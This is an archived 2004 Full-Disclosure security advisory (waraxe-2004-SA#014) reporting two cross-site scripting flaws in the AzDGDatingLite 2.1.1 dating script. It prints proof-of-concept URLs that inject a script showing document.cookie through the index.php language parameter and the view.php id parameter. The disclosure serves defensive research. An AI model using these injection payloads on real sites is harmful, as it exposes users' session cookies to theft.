[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] [waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
- To: laserplaat@xxxxxxxxx
- Subject: [Full-Disclosure] [waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
- From: Janek Vind <come2waraxe@xxxxxxxxx>
- Date: Thu, 8 Apr 2004 08:48:40 -0700 (PDT)
{================================================================================}
{ [waraxe-2004-SA#014]
}
{================================================================================}
{
}
{ [ Cross-Site Scripting aka XSS in
AzDGDatingLite ] }
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AzDGDatingLite: Version 2.1.1 (probably older
versions are affected too)
Writed by: AzDG (support@xxxxxxxx)
Homepage: http://www.azdg.com
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Cross-Site Scripting in language variable:
http://localhost/azdlite/index.php?l=en";><script>alert(document.cookie);</script>
2. Cross-Site Scripting in view.php:
http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@xxxxxxxxx
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ]
------------------------------------
__________________________________
Do you Yahoo!?
Yahoo! Small Business $15K Web Design Giveaway
http://promotions.yahoo.com/design_giveaway/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html